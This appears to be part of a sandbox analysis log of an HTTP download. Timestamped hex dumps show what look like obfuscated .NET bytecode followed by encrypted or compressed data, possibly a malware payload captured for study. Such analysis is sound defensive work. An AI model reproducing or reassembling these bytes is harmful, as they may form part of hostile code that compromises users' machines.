                                                                          2023-09-19 07:21:50 UTC4INData Raw: 00 00 00 63 5d fe 0e 17 00 20 49 d7 6d 47 20 44 f5 3e fd 61 20 03 96 40 28 58 20 0c b8 93 e2 61 65 fe 0e 19 00 38 f8 fc ff ff 38 5c 01 00 00 fe 0c 01 00 fe 0c 16 00 fe 0c 01 00 fe 0c 16 00 91 20 8e 44 c1 0f 20 5a 13 d8 e3 59 66 20 59 72 9c 0f 61 20 30 e1 61 08 58 66 20 39 bb 11 f3 61 20 db d8 02 ef 59 61 d2 9c 38 1e 01 00 00 fe 0c 01 00 fe 0c 16 00 fe 0c 01 00 fe 0c 16 00 91 20 3f 17 00 00 66 20 06 00 00 00 63 65 61 d2 9c 38 f8 00 00 00 fe 0c 01 00 fe 0c 16 00 fe 0c 01 00 fe 0c 16 00 91 20 28 8b 94 ea 65 20 4b 0f 66 29 61 20 37 e4 67 fb 58 20 3a 18 98 db 61 20 d2 d5 7e fe 61 66 20 fd 6a 6c ed 61 20 04 00 00 00 63 61 d2 9c 38 b4 00 00 00 fe 0c 01 00 fe 0c 16 00 fe 0c 01 00 fe 0c 16 00 91 20 80 8f 78 82 20 04 00 00 00 63 20 cc f8 91 f0 58 65 20 be a2 d6 1b
                                                                          Data Ascii: c] ImG D>a @(X ae88\ D ZYf Yra 0aXf 9a Ya8 ?f cea8 (e Kf)a 7gX :a ~af jla ca8 x c Xe
                                                                          2023-09-19 07:21:50 UTC5INData Raw: 15 af 27 59 20 b5 fb bc ff 61 66 65 20 17 3a 19 17 61 65 9a 6f 4a 00 00 0a 25 7e 4b 00 00 0a 6f 3f 00 00 0a 25 7e 46 00 00 0a fe 0c 07 00 6f 41 00 00 0a 25 7e 4c 00 00 0a 6f 3f 00 00 0a 25 7e 4d 00 00 0a fe 0c 11 00 6f 45 00 00 0a 25 7e 48 00 00 0a 20 47 58 7f de 20 bd a7 80 21 61 65 6f 3d 00 00 0a 25 7e 49 00 00 0a fe 0c 02 00 20 ce cb 8b f0 65 66 20 5a 6a 42 d7 61 20 80 99 ee 26 59 20 29 94 65 14 61 20 d1 63 41 eb 58 9a 6f 4a 00 00 0a 25 7e 4b 00 00 0a 6f 3f 00 00 0a 25 7e 46 00 00 0a fe 0c 07 00 6f 41 00 00 0a 25 7e 4c 00 00 0a 6f 3f 00 00 0a 25 7e 4d 00 00 0a fe 0c 11 00 6f 45 00 00 0a 25 7e 48 00 00 0a 20 ef 07 7c 27 66 20 db cc 1b 17 59 20 a3 06 66 e0 61 20 70 d2 f1 de 58 6f 3d 00 00 0a 25 7e 49 00 00 0a fe 0c 02 00 20 f2 87 2d 0f 20 58 5b d7 05 61
                                                                          Data Ascii: 'Y afe :aeoJ%~Ko?%~FoA%~Lo?%~MoE%~H GX !aeo=%~I ef ZjBa &Y )ea cAXoJ%~Ko?%~FoA%~Lo?%~MoE%~H |'f Y fa pXo=%~I - X[a
                                                                          2023-09-19 07:21:50 UTC7INData Raw: ad b4 61 12 61 20 86 70 70 f2 58 66 20 01 00 00 00 63 65 20 74 f3 0e ed 58 20 1e f4 f4 f6 59 20 01 00 00 00 62 fe 0e 18 00 38 55 f7 ff ff fe 0c 03 00 20 ca c5 73 c2 20 17 95 56 f4 59 66 65 20 65 10 2a 0c 58 20 e6 be b8 25 61 65 20 11 fc ce e1 20 79 85 2a 14 58 66 65 65 20 03 67 33 1e 59 65 20 8f e8 2c 14 59 66 72 84 02 00 70 6f 62 00 00 0a 26 20 56 35 c6 22 20 dd 79 49 fb 61 20 0e 2b f7 da 59 20 e6 a1 9d ff 61 20 9d 80 05 01 59 fe 0e 18 00 38 ea f6 ff ff d0 2c 00 00 01 28 10 00 00 0a fe 0c 02 00 20 bb cb 1a f7 20 d4 f6 7e f4 59 65 66 20 6d f7 0a e4 59 20 75 dd 90 1e 61 9a 20 f5 d0 c4 53 20 6e b1 5e e4 58 65 20 0a 2f 41 e7 61 65 20 68 9e c5 e6 59 66 20 ca f0 62 07 61 14 20 10 95 f1 51 20 04 00 00 00 63 65 20 4e 19 1f 05 58 66 8d 0e 00 00 01 25 20 19 46 b8
                                                                          Data Ascii: aa ppXf ce tX Y b8U s VYfe e*X %ae y*Xfee g3Ye ,Yfrpob& V5" yIa +Y a Y8,( ~Yef mY ua S n^Xe /Aae hYf ba Q ce NXf% F
                                                                          2023-09-19 07:21:50 UTC8INData Raw: e9 58 20 f9 5b 9d df 59 20 63 74 f3 f5 58 20 39 5f a5 e6 59 20 82 04 03 26 61 20 04 00 00 00 63 65 9a 20 16 84 e2 02 20 e0 8a 56 05 61 66 20 8d 9c fc 26 59 20 26 e7 a3 08 58 20 6e 3b f3 d9 59 14 20 d6 2f bb 55 66 20 61 8f e8 d7 59 20 e2 9b 51 21 61 20 aa da 0d f3 59 20 06 00 00 00 63 8d 0e 00 00 01 25 20 f9 ce 95 2f 66 20 b9 6a ee ec 61 20 77 e9 98 da 58 20 fc c3 85 f8 61 66 20 84 28 8b eb 59 20 4f af 23 db 58 d0 01 00 00 01 28 10 00 00 0a a2 25 20 1f c0 ff ff 66 20 05 00 00 00 63 66 20 01 00 00 00 63 65 20 06 00 00 00 63 20 02 00 00 00 63 d0 01 00 00 01 28 10 00 00 0a a2 14 28 63 00 00 0a fe 0e 0c 00 20 28 04 89 ea 20 4f 22 a2 fd 58 20 6b 26 2b e8 61 66 fe 0e 18 00 38 44 f1 ff ff d0 3f 00 00 01 28 10 00 00 0a 20 6e 2a f9 39 65 20 f4 32 06 d7 59 65 20 c2
                                                                          Data Ascii: X [Y ctX 9_Y &a ce Vaf &Y &X n;Y /Uf aY Q!a Y c% /f ja wX af (Y O#X(% f cf ce c c((c ( O"X k&+af8D?( n*9e 2Ye
                                                                          2023-09-19 07:21:50 UTC9INData Raw: 0c e6 61 20 02 00 00 00 62 65 20 51 87 b9 1b 61 65 20 32 51 16 f6 61 58 45 04 00 00 00 84 00 00 00 bc 00 00 00 7c 01 00 00 b3 01 00 00 20 5c 69 cd cf 20 95 74 9a dc 59 20 03 00 00 00 62 20 02 00 00 00 63 65 20 7c 16 9a 19 59 20 01 00 00 00 63 65 fe 0e 05 00 38 74 fd ff ff 20 6b e4 f0 16 66 20 9d 34 2f ee 59 20 94 a8 66 07 58 65 20 8d e5 16 23 58 20 c2 ae 2f df 61 20 06 00 00 00 63 fe 0e 04 00 20 28 5e ac 68 65 20 03 00 00 00 63 20 3b 87 ec 07 58 65 20 37 de 5d 27 61 20 b9 da 74 22 59 fe 0e 05 00 38 23 fd ff ff 38 fd fc ff ff fe 0c 02 00 39 38 01 00 00 20 1f 65 4a 2c 20 d6 cf 88 10 58 65 20 c3 7d 0a d8 61 65 20 bb 2c 7f 0c 61 20 03 5b 6b 03 59 66 20 9e 0a 3b e5 61 fe 0e 04 00 38 c5 fc ff ff 20 e4 b1 d1 c0 20 08 0a 0b 1c 58 20 ee bb dc dc 61 8d 0e 00 00 01
                                                                          Data Ascii: a be Qae 2QaXE| \i tY b ce |Y ce8t kf 4/Y fXe #X /a c (^he c ;Xe 7]'a t"Y8#898 eJ, Xe }ae ,a [kYf ;a8 X a
                                                                          2023-09-19 07:21:50 UTC11INData Raw: d2 42 db 61 20 2b 95 f5 07 61 20 f6 3d ff 28 59 20 07 00 00 00 63 fe 0e 02 00 38 66 fe ff ff fe 0c 01 00 20 18 e3 3a e5 20 87 b5 2c f2 58 20 b1 09 76 15 59 20 ae 15 10 25 58 65 20 ce ae 3d e1 61 20 81 0a 3c 06 58 58 45 03 00 00 00 20 00 00 00 6f 00 00 00 f4 00 00 00 20 1c 0f 07 fb 65 20 db 3b 3a f5 61 20 df 34 3d 0e 58 fe 0e 02 00 38 11 fe ff ff 38 f2 fd ff ff 20 d8 e0 31 48 20 58 c7 e9 20 58 20 3c 17 db e8 61 20 56 ba ec ee 59 20 b5 92 39 2a 61 20 31 0b 0c e2 59 20 e2 8a e1 d6 59 fe 0e 00 00 20 5f de 9b 3a 20 a2 ec bc e7 61 65 20 e3 cd d8 22 61 20 05 00 00 00 63 65 fe 0e 01 00 38 a3 fd ff ff fe 0c 00 00 20 55 1c e7 db 66 65 20 6b d6 03 02 61 20 a3 29 c8 d5 59 20 93 5f e3 fb 58 58 45 0a 00 00 00 3f 00 00 00 5c 00 00 00 73 00 00 00 9c 00 00 00 b8 00 00 00
                                                                          Data Ascii: Ba +a =(Y c8f : ,X vY %Xe =a <XXE o e ;:a 4=X88 1H X X <a VY 9*a 1Y Y _: ae "a ce8 Ufe ka )Y _XXE?\s
                                                                          2023-09-19 07:21:50 UTC12INData Raw: 09 38 61 ff ff ff 11 05 6f 75 00 00 0a 8d 39 00 00 01 13 06 1f f1 13 09 38 4a ff ff ff 16 13 07 1f f4 13 09 38 3e ff ff ff 06 6f 76 00 00 0a 13 05 1f f0 13 09 38 2d ff ff ff 11 07 17 58 13 07 11 07 11 06 8e 69 3f 6d ff ff ff 08 11 04 11 06 73 32 00 00 0a a2 11 04 17 58 13 04 11 04 07 32 c8 08 80 18 00 00 04 2b 1f 11 08 1e 61 13 08 11 08 19 58 45 04 00 00 00 06 00 00 00 15 00 00 00 22 00 00 00 35 00 00 00 1f f7 13 08 2b db 06 09 16 07 6f 77 00 00 0a 26 1e 13 08 2b cc 07 8d 1a 00 00 01 0d 1f f5 13 08 2b bf 06 6f 73 00 00 0a 20 6e 9d 90 73 61 0b 1f f6 13 08 2b ac 09 28 0c 00 00 0a 2a 13 30 07 00 73 00 00 00 0d 00 00 11 02 28 78 00 00 0a 02 28 79 00 00 0a 0a 12 00 28 7a 00 00 0a 73 7b 00 00 0a 7d 1a 00 00 04 02 17 8d 50 00 00 01 25 16 20 80 00 00 00 20 80 00
                                                                          Data Ascii: 8aou98J8>ov8-Xi?ms2X2+aXE"5+ow&++os nsa+(*0s(x(y(zs{}P%
                                                                          2023-09-19 07:21:50 UTC13INData Raw: 2a 72 fc 02 00 70 06 28 91 00 00 0a 0b 07 16 28 92 00 00 0a 0c 08 2c 03 17 2b 03 16 2b 00 2d 12 07 72 38 03 00 70 28 91 00 00 0a 16 28 92 00 00 0a 0c 08 2c 03 17 2b 03 16 2b 00 2d 11 72 8c 03 00 70 07 28 93 00 00 0a 73 94 00 00 0a 7a 08 74 0e 00 00 01 72 bc 03 00 70 20 18 01 00 00 14 14 14 6f 0e 00 00 0a 74 09 00 00 01 2a 00 00 00 13 30 04 00 27 00 00 00 10 00 00 11 20 00 10 00 00 8d 1a 00 00 01 0a 02 06 16 06 8e 69 6f 95 00 00 0a 0b 07 16 30 01 2a 03 06 16 07 6f 96 00 00 0a 2b e4 1e 13 30 03 00 11 05 00 00 11 00 00 11 00 00 00 00 00 00 00 00 00 00 20 20 01 00 00 8d 1a 00 00 02 80 1b 00 00 04 1f 20 8d 1a 00 00 02 80 1c 00 00 04 1f 13 8d 2e 00 00 01 80 1e 00 00 04 7e 1e 00 00 04 16 1f 10 9e 7e 1e 00 00 04 17 1f 11 9e 7e 1e 00 00 04 18 1f 12 9e 7e 1e 00 00
                                                                          Data Ascii: *rp((,++-r8p((,++-rp(sztrp ot*0' io0*o+0 .~~~~
                                                                          2023-09-19 07:21:50 UTC15INData Raw: 11 07 8f 1a 00 00 02 1e 7d 28 00 00 04 11 07 17 58 13 07 11 07 20 1f 01 00 00 31 c0 16 13 08 2b 2b 7e 1c 00 00 04 11 08 8f 1a 00 00 02 11 08 7d 27 00 00 04 7e 1c 00 00 04 11 08 8f 1a 00 00 02 1b 7d 28 00 00 04 11 08 17 58 13 08 11 08 1f 1f 31 cf 7e 1b 00 00 04 7e 1c 00 00 04 28 61 00 00 06 80 1d 00 00 04 2a 00 00 00 13 30 04 00 4c 00 00 00 12 00 00 11 00 16 0a 2b 16 08 45 04 00 00 00 0a 00 00 00 18 00 00 00 1e 00 00 00 25 00 00 00 1f 13 28 79 00 00 06 0c 2b e0 06 02 07 94 03 07 94 5a 58 0a 19 0c 2b d2 16 0b 18 0c 2b cc 07 2c 08 16 0c 2b c5 07 17 58 0b 07 02 8e 69 32 db 06 2a 13 30 04 00 be 00 00 00 13 00 00 11 00 16 0a 2b 16 09 45 04 00 00 00 0a 00 00 00 11 00 00 00 32 00 00 00 38 00 00 00 1f 14 28 79 00 00 06 0d 2b e0 07 2c 2f 17 0d 2b d9 06 02 07 94 7e
                                                                          Data Ascii: }(X 1++~}'~}(X1~~(a*0L+E%(y+ZX++,+Xi2*0+E28(y+,/+~
                                                                          2023-09-19 07:21:50 UTC16INData Raw: 07 2b 88 11 06 7b 23 00 00 04 7b 28 00 00 04 05 33 76 18 13 07 38 71 ff ff ff 73 75 00 00 06 0c 16 13 07 38 63 ff ff ff 08 11 06 7b 24 00 00 04 7d 2a 00 00 04 1f 0b 13 07 38 4d ff ff ff 16 13 05 17 13 07 38 42 ff ff ff 03 8d 18 00 00 02 0b 1a 13 07 38 33 ff ff ff 02 11 05 a3 18 00 00 02 13 06 19 13 07 38 21 ff ff ff 16 25 13 04 0d 1c 13 07 38 14 ff ff ff 08 17 7d 29 00 00 04 1b 13 07 38 05 ff ff ff 2b 4d 11 06 7b 23 00 00 04 7b 27 00 00 04 11 06 7b 23 00 00 04 7b 28 00 00 04 05 59 17 59 1f 1f 5f 63 17 5f 16 fe 03 2c 03 16 2b 03 17 2b 00 2d 0f 07 09 25 17 58 0d 11 06 a4 18 00 00 02 2b 0f 06 11 04 25 17 58 13 04 11 06 a4 18 00 00 02 11 05 17 58 13 05 11 05 03 3f 75 ff ff ff 08 7b 29 00 00 04 2c 03 17 2b 03 16 2b 00 2d 32 11 04 16 31 14 08 06 11 04 04 17 62
                                                                          Data Ascii: +{#{(3v8qsu8c{$}*8M8B838!%8})8+M{#{'{#{(YY_c_,++-%X+%XX?u{),++-21b
                                                                          2023-09-19 07:21:50 UTC17INData Raw: 07 94 9e 1f 0a 28 79 00 00 06 13 0a 2b c5 16 13 07 18 13 0a 2b bd 11 07 2c 0b 16 13 0a 2b b4 11 07 17 58 13 07 11 07 11 04 8e 69 32 c8 11 05 2a 13 30 06 00 dc 01 00 00 1b 00 00 11 00 02 8e 69 0a 2b 23 11 0e 45 07 00 00 00 0b 00 00 00 23 00 00 00 33 00 00 00 3f 00 00 00 48 00 00 00 57 00 00 00 62 00 00 00 1f 14 28 79 00 00 06 13 0e 2b d2 08 11 05 02 11 05 18 5a 94 02 11 05 18 5a 17 58 94 58 9e 1c 13 0e 2b ba 02 8e 69 18 5b 8d 2e 00 00 01 0c 1b 13 0e 2b aa 03 8d 04 00 00 1b 0b 1a 13 0e 2b 9e 11 05 2c 25 16 13 0e 2b 95 07 16 02 a2 1f 13 28 79 00 00 06 13 0e 2b 86 16 13 05 19 13 0e 38 7b ff ff ff 11 05 17 58 13 05 11 05 08 8e 69 32 9c 17 13 06 11 06 3a 95 00 00 00 08 02 28 6e 00 00 06 13 07 2b 1f 11 0f 45 06 00 00 00 0b 00 00 00 25 00 00 00 2e 00 00 00 39 00
                                                                          Data Ascii: (y++,+Xi2*0i+#E#3?HWb(y+ZZXX+i[.++,%+(y+8{Xi2:(n+E%.9
                                                                          2023-09-19 07:21:50 UTC19INData Raw: 00 06 7d 30 00 00 04 2a 00 00 00 13 30 05 00 a8 00 00 00 12 00 00 11 05 2c 03 16 2b 03 17 2b 00 2d 10 02 7b 38 00 00 04 2c 03 16 2b 03 17 2b 00 2d 02 16 2a 16 0a 06 39 7d 00 00 00 02 02 28 7c 00 00 06 16 fe 01 7d 38 00 00 04 02 7b 32 00 00 04 16 2f 10 02 7b 38 00 00 04 2c 03 16 2b 03 17 2b 00 2d d8 02 7b 38 00 00 04 2c 03 17 2b 03 16 2b 00 2d 49 02 03 04 06 58 05 06 59 28 7d 00 00 06 0b 2b 12 08 45 03 00 00 00 0a 00 00 00 12 00 00 00 1a 00 00 00 1f 09 28 79 00 00 06 0c 2b e4 07 16 31 0e 17 0c 2b dc 06 07 58 0a 18 0c 2b d4 2b 07 02 15 7d 32 00 00 04 06 05 32 8e 06 2a 13 30 04 00 4c 04 00 00 21 00 00 11 fe 09 00 00 7b 34 00 00 04 39 0c 00 00 00 20 ff ff ff ff 66 65 38 16 00 00 00 20 5d 0f 04 15 20 4d 0f 04 15 59 20 04 00 00 00 63 38 00 00 00 00 3a 0d 00 00
                                                                          Data Ascii: }0*0,++-{8,++-*9}(|}8{2/{8,++-{8,++-IXY(}+E(y+1+X++}22*0L!{49 fe8 ] MY c8:
                                                                          2023-09-19 07:21:50 UTC20INData Raw: 20 04 00 00 00 63 3e d6 03 00 00 fe 09 03 00 fe 09 00 00 7b 35 00 00 04 28 9b 00 00 0a fe 0e 01 00 38 21 00 00 00 fe 0c 05 00 45 06 00 00 00 1a 00 00 00 4e 00 00 00 6b 00 00 00 9a 00 00 00 bb 00 00 00 e1 00 00 00 20 80 fb ff ff 20 07 00 00 00 63 65 28 79 00 00 06 fe 0e 05 00 38 c5 ff ff ff fe 09 00 00 7b 30 00 00 04 fe 09 01 00 fe 09 02 00 fe 0c 01 00 6f 89 00 00 06 20 d9 60 16 df 65 20 33 9f e9 20 61 28 79 00 00 06 fe 0e 05 00 38 91 ff ff ff fe 09 02 00 fe 0c 01 00 58 fe 0b 02 00 20 04 00 00 00 66 65 fe 0e 05 00 38 74 ff ff ff fe 09 00 00 7b 2f 00 00 04 fe 09 01 00 fe 09 02 00 fe 0c 01 00 6f 8c 00 00 06 20 f8 ff ff ff 20 01 00 00 00 63 65 fe 0e 05 00 38 45 ff ff ff fe 09 03 00 fe 0c 01 00 59 fe 0b 03 00 20 08 00 00 00 20 03 00 00 00 63 fe 0e 05 00 38 24
                                                                          Data Ascii: c>{5(8!ENk ce(y8{0o `e 3 a(y8X fe8t{/o ce8EY c8$
                                                                          2023-09-19 07:21:50 UTC21INData Raw: 7b 00 00 06 25 0b 16 30 dd 03 16 fe 02 16 fe 01 2a 13 30 04 00 1c 00 00 00 01 00 00 11 20 00 04 00 00 8d 1a 00 00 01 0a 02 06 16 20 00 04 00 00 28 7b 00 00 06 16 30 f0 2a 03 30 02 00 40 00 00 00 00 00 00 00 2b 1c 02 17 6f 87 00 00 06 16 30 08 03 7b 2b 00 00 04 2b 06 03 7b 2c 00 00 04 fe 0b 01 00 03 2c 03 16 2b 03 17 2b 00 2d 10 03 7b 29 00 00 04 2c 03 16 2b 03 17 2b 00 2d c9 03 7b 2a 00 00 04 2a 13 30 03 00 1a 00 00 00 18 00 00 11 03 12 00 12 01 28 64 00 00 06 07 16 31 0a 06 02 07 6f 87 00 00 06 58 2a 06 2a 00 00 13 30 02 00 6c 00 00 00 13 00 00 11 00 02 03 28 81 00 00 06 0a 2b 1b 11 04 45 05 00 00 00 0b 00 00 00 1d 00 00 00 2a 00 00 00 33 00 00 00 40 00 00 00 1f 13 28 79 00 00 06 13 04 2b da 02 08 6f 87 00 00 06 0d 1e 28 79 00 00 06 13 04 2b c8 7e 21 00
                                                                          Data Ascii: {%0*0 ({0*0@+o0{++{,,++-{),++-{**0(d1oX**0l(+E*3@(y+o(y+~!
                                                                          2023-09-19 07:21:50 UTC23INData Raw: 3c 00 00 04 2e 1b 02 02 7b 3f 00 00 04 02 7b 3d 00 00 04 02 7b 3c 00 00 04 59 6a 58 7d 3f 00 00 04 02 02 16 25 0a 7d 3c 00 00 04 06 7d 3d 00 00 04 02 16 7d 3b 00 00 04 2a 00 00 00 13 30 04 00 21 00 00 00 20 00 00 11 02 7b 3e 00 00 04 03 04 05 6f 95 00 00 0a 0a 02 02 7b 3f 00 00 04 06 19 62 6a 58 7d 3f 00 00 04 2a 6a 02 28 0f 00 00 0a 02 03 7d 42 00 00 04 02 03 8d 1a 00 00 01 7d 40 00 00 04 2a 13 30 04 00 3e 00 00 00 20 00 00 11 02 7b 40 00 00 04 02 02 7b 41 00 00 04 0a 06 17 58 7d 41 00 00 04 06 03 9c 02 7b 41 00 00 04 02 7b 42 00 00 04 32 07 02 16 7d 41 00 00 04 02 02 7b 43 00 00 04 17 6a 58 7d 43 00 00 04 2a 00 00 13 30 05 00 5a 01 00 00 13 00 00 11 00 02 02 7b 43 00 00 04 05 6a 58 7d 43 00 00 04 2b 17 11 04 45 04 00 00 00 0b 00 00 00 24 00 00 00 30 00
                                                                          Data Ascii: <.{?{={<YjX}?%}<}=};*0! {>o{?bjX}?*j(}B}@*0> {@{AX}A{A{B2}A{CjX}C*0Z{CjX}C+E$0
                                                                          2023-09-19 07:21:50 UTC24INData Raw: 0b 5d ed ef e4 9d 80 e5 fb 75 7f 1d d8 cd 2d c6 b0 35 f6 d0 b1 75 c9 3a c9 d1 6d 6c 87 4a 9a e1 d5 b8 15 10 ee e0 b8 fe 66 b3 de d5 d8 9e f0 ce e4 b2 94 c0 bb 13 13 6b d3 cc ba 84 1e eb f0 99 c6 01 2f ba b9 7b 8d ea 7f 31 17 7c 12 1e 9d 10 82 2e b2 67 32 86 22 9c d0 41 5c d5 34 65 12 a7 a7 a2 a1 a5 42 cd d4 17 e4 49 45 64 0f 25 23 2a 79 47 dd 1d bd de b1 8b 43 14 26 c2 02 6c 94 57 4b a0 dc 43 0c 7f 7d 5b e0 c2 58 dc fd 65 0b 55 79 83 62 43 18 19 86 34 7d 02 f4 72 c7 ff bb 7c bd 2f 6a 47 7f ee a8 a0 f7 5d 71 4a 37 1f b9 41 09 d1 00 b4 2b 51 a1 bf 98 1c 5f ab 0c 5d 6d 65 7c b8 0c cb f7 a4 a4 59 5a e8 1a 8c 6d 85 5b 77 b6 30 02 9d d4 cf 46 16 61 a3 54 5f ca 60 04 94 85 b8 08 06 e0 10 03 2c d8 04 6f 5c 93 96 74 1b c6 fa 57 d8 1b f0 b9 81 1e ef 1f 40 a2 97 ac
                                                                          Data Ascii: ]u-5u:mlJfk/{1|.g2"A\4eBIEd%#*yGC&lWKC}[XeUybC4}r|/jG]qJ7A+Q_]me|YZm[w0FaT_`,o\tW@
                                                                          2023-09-19 07:21:50 UTC25INData Raw: 58 34 c7 d7 25 e1 da c6 4a 09 67 44 99 7f a5 2a 76 a5 5e a7 00 d9 48 b9 bf f4 e2 f5 48 31 c8 87 4f c2 85 2b fe 84 59 0c 17 d4 28 b0 3f a1 f2 04 a1 d1 6b 02 d0 d8 dc 67 5a 27 d3 05 37 51 a9 a6 ee a9 2b 55 df 51 59 64 f6 9a a6 97 1c 4a 14 22 71 e9 45 5f b7 62 08 1a da f4 2c db 4a 00 5d 2e ad 14 b4 58 f3 dd fe cf db d8 9a 32 3e 97 43 3d 61 a5 13 83 16 22 74 ee 2d b1 0c 33 6f 67 7d ae 6d 12 0d 2f 5f c8 99 8b c8 c6 05 67 fe c4 26 6b 53 56 98 e3 61 79 d8 e3 28 52 d3 98 55 96 7e c8 4f a3 84 15 b9 96 15 13 f2 51 36 52 fc 4b 7e 6b 4c 75 fc de 35 83 aa 84 90 f5 b0 b2 ee 18 b1 24 77 5c 8c 8b 38 16 cf 3a 06 2f 1e 85 7e 7a 3d ea c3 69 8a f3 09 63 cf bd 3f 4c 79 a9 bb a8 a1 99 66 00 b1 ba 26 c0 5b 3f a4 12 6c 9b e1 6e f1 55 71 eb 54 47 43 0f a8 09 cd 84 7f ee 38 7d 6a
                                                                          Data Ascii: X4%JgD*v^HH1O+Y(?kgZ'7Q+UQYdJ"qE_b,J].X2>C=a"t-3og}m/_g&kSVay(RU~OQ6RK~kLu5$w\8:/~z=ic?Lyf&[?lnUqTGC8}j
                                                                          2023-09-19 07:21:50 UTC27INData Raw: 1c d7 ab 90 c7 ff 86 be 61 4c 2b a3 43 93 87 51 7e a4 7a 94 94 4b 86 c5 07 8b 83 be e9 34 9b 59 57 02 df 60 1b e2 dd dd 3e b0 f6 40 5f e1 11 5e 7b 80 2d e1 d9 22 1a ec 96 94 4d 33 41 28 3e 91 71 97 d2 8e 98 ca ca 5f 76 de 2a 3b 51 1c 7d 37 8e a3 d7 88 bd ad 47 6b ac 88 29 90 b8 95 23 ac 05 d0 7f eb 53 15 80 49 56 24 a6 05 6a 87 2d 82 d4 51 30 53 15 0b e6 5d d4 dd 53 9c ed a6 15 f2 1a 5c 39 44 9d 91 ba f9 37 83 71 cb 22 07 99 64 85 da 95 15 64 f7 58 05 33 9e 97 b4 22 be 9e df e2 fc 3e f4 77 39 91 aa 8a 14 3a 26 24 24 5c 13 7e 77 3d 1a 55 1d e9 e8 af bc f2 ec 4b 81 e1 97 4e 0c bd b5 5e 0d 6d 39 11 ca 19 4c 28 39 a7 e3 52 29 b1 c6 44 17 fb 5f 0f 40 15 e1 79 9e d2 5a a2 f9 cc 45 c6 b0 88 65 12 73 94 36 0b 10 dc d9 d1 1d c5 16 1f 48 66 33 09 9e a8 42 0a d9 88
                                                                          Data Ascii: aL+CQ~zK4YW`>@_^{-"M3A(>q_v*;Q}7Gk)#SIV$j-Q0S]S\9D7q"ddX3">w9:&$$\~w=UKN^m9L(9R)D_@yZEes6Hf3B
                                                                          2023-09-19 07:21:50 UTC28INData Raw: 44 68 68 da ab 59 24 87 11 f9 2e 81 c4 73 e6 0b e3 11 3d 92 0c 89 a4 24 17 00 15 03 9b 32 68 a3 b0 6d 8c 4f b1 2d cc 36 2e 2f 80 00 b3 18 e6 4f 99 b7 4c 13 4d 44 f5 9f 3a 84 6c b1 a3 5d 26 64 42 6a cf db 04 c4 ae ec 9a 27 c9 b7 42 9a 95 80 a7 75 22 d3 c0 c3 9d 15 64 2b ea 38 4b 74 dd 5a a3 07 81 ba c3 c9 69 3d 5d 25 fc 37 a5 b3 0e 6a 22 9e 05 03 8d 73 09 fb 80 76 70 14 86 83 b1 09 ec be 5c b7 1b 2a b4 db 5a b7 c8 8a ae 9b 0b 32 0b d9 9e 1a 4d 5a be 30 04 28 6f 8d 25 52 73 79 af 7b 03 28 d5 14 32 ac a8 03 1b 15 bf c5 bb 72 f4 e0 ae 19 2e 21 69 50 90 90 e8 02 66 b6 ac 96 50 a4 d0 b5 ef 39 1a 5a 55 8c 2a c6 0b 8a 97 a3 cb 76 63 32 b2 6b 4b 75 16 d1 2c 1a 9e 4d ed 65 ad 9a 3e 1a dd d3 73 12 6f d8 5c 01 b0 2f 30 a9 75 06 9c 86 ab 00 c9 ac 15 0c 78 37 79 a7 ae
                                                                          Data Ascii: DhhY$.s=$2hmO-6./OLMD:l]&dBj'Bu"d+8KtZi=]%7j"svp\*Z2MZ0(o%Rsy{(2r.!iPfP9ZU*vc2kKu,Me>so\/0ux7y
                                                                          2023-09-19 07:21:50 UTC29INData Raw: 67 e9 1a 61 12 87 09 91 b5 63 de 89 5b 9a 95 da a3 47 b1 5b 20 33 85 26 db ed 06 f5 0f 4b 94 44 73 39 0f a6 3d e7 ce 71 28 8f de 01 9b 25 ff 4c 14 25 1d 5f 85 88 ae d4 55 ac 47 40 56 40 1b 0f 7f c6 ef 48 ac b3 ce e4 a0 1b ef 57 c5 cf c8 5e bb 51 10 0e 9e f7 e6 9f f8 05 df 6e 4c 92 93 63 2f 84 a3 3e 89 3f c6 fd b7 0b 31 ae 10 ca 7c 99 81 1c 1b d6 3c 58 4e fb 2d a4 c0 54 2c 9e 44 c2 b8 91 a8 85 af c7 99 5f a4 ba 06 3e 46 ef c3 be 11 6d b9 ef 5a 0a 7c aa 53 e3 2b 8c 68 32 7b f0 0b 52 67 65 22 a1 67 bd f1 22 c9 20 11 80 2c 20 29 ff c0 20 90 9b ee 29 d8 d9 64 71 2b c5 96 ce 37 91 50 02 78 c3 44 bf 9a 71 e9 9f e4 e7 ae 13 8f c3 b0 94 68 ef b3 58 9d 14 d8 f5 5a 08 2a 78 bc 63 c2 7f 2d b5 cf 19 23 1f a5 14 ed e0 1c b4 c7 ed c4 8d c9 13 12 6d 9b e7 e9 50 86 cf fc
                                                                          Data Ascii: gac[G[ 3&KDs9=q(%L%_UG@V@HW^QnLc/>?1|<XN-T,D_>FmZ|S+h2{Rge"g" , ) )dq+7PxDqhXZ*xc-#mP
                                                                          2023-09-19 07:21:50 UTC31INData Raw: 62 9c 17 72 8a f2 ad 06 32 8b 68 6e 6a 1c de 08 ae 50 94 68 6b 9d 98 5f d4 a3 3e f4 f7 23 38 66 f7 47 92 4e d8 f2 99 ae 48 d0 70 7b 7f 47 78 75 9f 86 56 e3 25 2f 21 e2 1c 67 06 b4 b0 36 04 e6 4d 79 a3 46 3b 35 df d5 6d df ef 3f c6 16 43 de f5 47 be f7 b6 2f b6 7b f9 f3 d9 93 cd a3 1e 9f 58 24 34 45 56 73 74 2e 07 ea c8 7f 53 87 54 ad 9a 91 77 50 e1 32 40 f6 bc 3d b5 9d 32 c4 c1 06 c9 8c aa 2a c0 b9 1d 78 75 d1 93 62 b0 a7 b4 23 73 79 01 19 de 89 6f 1a 85 83 49 74 09 1a 9f 2e 2d e5 a1 9b 3f 59 a3 7f d3 6d 84 79 61 c3 e5 09 10 f1 b5 9d cb 7e 91 d7 e8 b5 e8 c2 f1 ab 0e 72 9e 1f 5f e7 4a 73 06 c7 af e7 2e 6d b8 89 93 92 ec c0 8c d4 92 e8 7e 09 4e a9 70 01 e9 09 78 fc 1b ff 68 be 55 fe 5a 14 8a 88 85 4e e4 e6 d2 e7 88 76 dc 04 6f 32 50 26 26 54 ab 86 d4 e2 95
                                                                          Data Ascii: br2hnjPhk_>#8fGNHp{GxuV%/!g6MyF;5m?CG/{X$4EVst.STwP2@=2*xub#syoIt.-?Ymya~r_Js.m~NpxhUZNvo2P&&T
